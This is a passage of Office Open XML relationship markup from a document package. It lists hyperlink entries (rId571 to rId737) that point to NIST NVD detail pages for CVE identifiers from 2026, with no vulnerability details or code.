Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69844" TargetMode="External" Id="rId571" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69864" TargetMode="External" Id="rId572" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69900" TargetMode="External" Id="rId573" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69907" TargetMode="External" Id="rId574" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69921" TargetMode="External" Id="rId575" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70289" TargetMode="External" Id="rId576" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70334" TargetMode="External" Id="rId577" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70564" TargetMode="External" Id="rId578" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70569" TargetMode="External" Id="rId579" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70572" TargetMode="External" Id="rId580" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70574" TargetMode="External" Id="rId581" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70581" TargetMode="External" Id="rId582" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70583" TargetMode="External" Id="rId583" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70584" TargetMode="External" Id="rId584" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71334" TargetMode="External" Id="rId585" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71337" TargetMode="External" Id="rId586" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71343" TargetMode="External" Id="rId587" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71345" TargetMode="External" Id="rId588" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72929" TargetMode="External" Id="rId589" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72941" TargetMode="External" Id="rId590" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72944" TargetMode="External" Id="rId591" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72946" TargetMode="External" Id="rId592" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72953" TargetMode="External" Id="rId593" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72957" TargetMode="External" Id="rId594" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72965" TargetMode="External" Id="rId595" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72967" TargetMode="External" Id="rId596" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72988" TargetMode="External" Id="rId597" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72990" TargetMode="External" Id="rId598" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72991" TargetMode="External" Id="rId599" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72992" TargetMode="External" Id="rId600" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72993" TargetMode="External" Id="rId601" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72994" TargetMode="External" Id="rId602" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72995" TargetMode="External" Id="rId603" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72996" TargetMode="External" Id="rId604" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72997" TargetMode="External" Id="rId605" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73000" TargetMode="External" Id="rId606" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73001" TargetMode="External" Id="rId607" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73002" TargetMode="External" Id="rId608" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73007" TargetMode="External" Id="rId609" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73011" TargetMode="External" Id="rId610" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73014" TargetMode="External" Id="rId611" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73015" TargetMode="External" Id="rId612" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73020" TargetMode="External" Id="rId613" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73021" TargetMode="External" Id="rId614" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73024" TargetMode="External" Id="rId615" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73026" TargetMode="External" Id="rId616" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7476" TargetMode="External" Id="rId617" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-7477" TargetMode="External" Id="rId618" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75631" TargetMode="External" Id="rId619" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75771" TargetMode="External" Id="rId620" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75862" TargetMode="External" Id="rId621" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75863" TargetMode="External" Id="rId622" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75992" TargetMode="External" Id="rId623" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76967" TargetMode="External" Id="rId624" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77091" TargetMode="External" Id="rId625" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77489" TargetMode="External" Id="rId626" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77500" TargetMode="External" Id="rId627" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77503" TargetMode="External" Id="rId628" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77904" TargetMode="External" Id="rId629" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78447" TargetMode="External" Id="rId630" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78448" TargetMode="External" Id="rId631" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79907" TargetMode="External" Id="rId632" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79908" TargetMode="External" Id="rId633" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79909" TargetMode="External" Id="rId634" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80075" TargetMode="External" Id="rId635" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80161" TargetMode="External" Id="rId636" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81353" TargetMode="External" Id="rId637" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81386" TargetMode="External" Id="rId638" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81388" TargetMode="External" Id="rId639" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81396" TargetMode="External" Id="rId640" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81397" TargetMode="External" Id="rId641" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81398" TargetMode="External" Id="rId642" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81947" TargetMode="External" Id="rId643" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81948" TargetMode="External" Id="rId644" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81949" TargetMode="External" Id="rId645" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81950" TargetMode="External" Id="rId646" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81951" TargetMode="External" Id="rId647" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81953" TargetMode="External" Id="rId648" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81954" TargetMode="External" Id="rId649" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81956" TargetMode="External" Id="rId650" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81957" TargetMode="External" Id="rId651" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81959" TargetMode="External" Id="rId652" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81960" TargetMode="External" Id="rId653" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81973" TargetMode="External" Id="rId654" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81975" TargetMode="External" Id="rId655" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81976" TargetMode="External" Id="rId656" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81979" TargetMode="External" Id="rId657" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81980" TargetMode="External" Id="rId658" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81981" TargetMode="External" Id="rId659" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81983" TargetMode="External" Id="rId660" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81985" TargetMode="External" Id="rId661" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81986" TargetMode="External" Id="rId662" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81987" TargetMode="External" Id="rId663" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81988" TargetMode="External" Id="rId664" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81989" TargetMode="External" Id="rId665" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81990" TargetMode="External" Id="rId666" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81992" TargetMode="External" Id="rId667" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82005" TargetMode="External" Id="rId668" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82006" TargetMode="External" Id="rId669" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82007" TargetMode="External" Id="rId670" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83498" TargetMode="External" Id="rId671" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83942" TargetMode="External" Id="rId672" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83952" TargetMode="External" Id="rId673" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83954" TargetMode="External" Id="rId674" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83955" TargetMode="External" Id="rId675" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83967" TargetMode="External" Id="rId676" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83968" TargetMode="External" Id="rId677" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83969" TargetMode="External" Id="rId678" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83970" TargetMode="External" Id="rId679" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83971" TargetMode="External" Id="rId680" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83972" TargetMode="External" Id="rId681" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83973" TargetMode="External" Id="rId682" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83974" TargetMode="External" Id="rId683" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83975" TargetMode="External" Id="rId684" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83976" TargetMode="External" Id="rId685" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83977" TargetMode="External" Id="rId686" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83978" TargetMode="External" Id="rId687" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83979" TargetMode="External" Id="rId688" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83980" TargetMode="External" Id="rId689" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83981" TargetMode="External" Id="rId690" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83982" TargetMode="External" Id="rId691" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83983" TargetMode="External" Id="rId692" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83985" TargetMode="External" Id="rId693" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83986" TargetMode="External" Id="rId694" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83987" TargetMode="External" Id="rId695" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83988" TargetMode="External" Id="rId696" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83990" TargetMode="External" Id="rId697" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83995" TargetMode="External" Id="rId698" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84000" TargetMode="External" Id="rId699" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85983" TargetMode="External" Id="rId700" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9034" TargetMode="External" Id="rId701" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19397" TargetMode="External" Id="rId702" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66767" TargetMode="External" Id="rId703" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69683" TargetMode="External" Id="rId704" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73315" TargetMode="External" Id="rId705" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77909" TargetMode="External" Id="rId706" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78623" TargetMode="External" Id="rId707" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82537" TargetMode="External" Id="rId708" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9040" TargetMode="External" Id="rId709" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77110" TargetMode="External" Id="rId710" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82053" TargetMode="External" Id="rId711" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86073" TargetMode="External" Id="rId712" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0860" TargetMode="External" Id="rId713" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16025" TargetMode="External" Id="rId714" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16037" TargetMode="External" Id="rId715" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16497" TargetMode="External" Id="rId716" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28604" TargetMode="External" Id="rId717" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-3174" TargetMode="External" Id="rId718" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47625" TargetMode="External" Id="rId719" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48888" TargetMode="External" Id="rId720" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57098" TargetMode="External" Id="rId721" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57099" TargetMode="External" Id="rId722" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62759" TargetMode="External" Id="rId723" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62813" TargetMode="External" Id="rId724" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66304" TargetMode="External" Id="rId725" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66307" TargetMode="External" Id="rId726" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67376" TargetMode="External" Id="rId727" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68887" TargetMode="External" Id="rId728" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69329" TargetMode="External" Id="rId729" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69342" TargetMode="External" Id="rId730" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69378" TargetMode="External" Id="rId731" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69397" TargetMode="External" Id="rId732" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69428" TargetMode="External" Id="rId733" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69429" TargetMode="External" Id="rId734" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69443" TargetMode="External" Id="rId735" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69514" TargetMode="External" Id="rId736" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69539" TargetMode="External" Id="rId737" /><Relationship 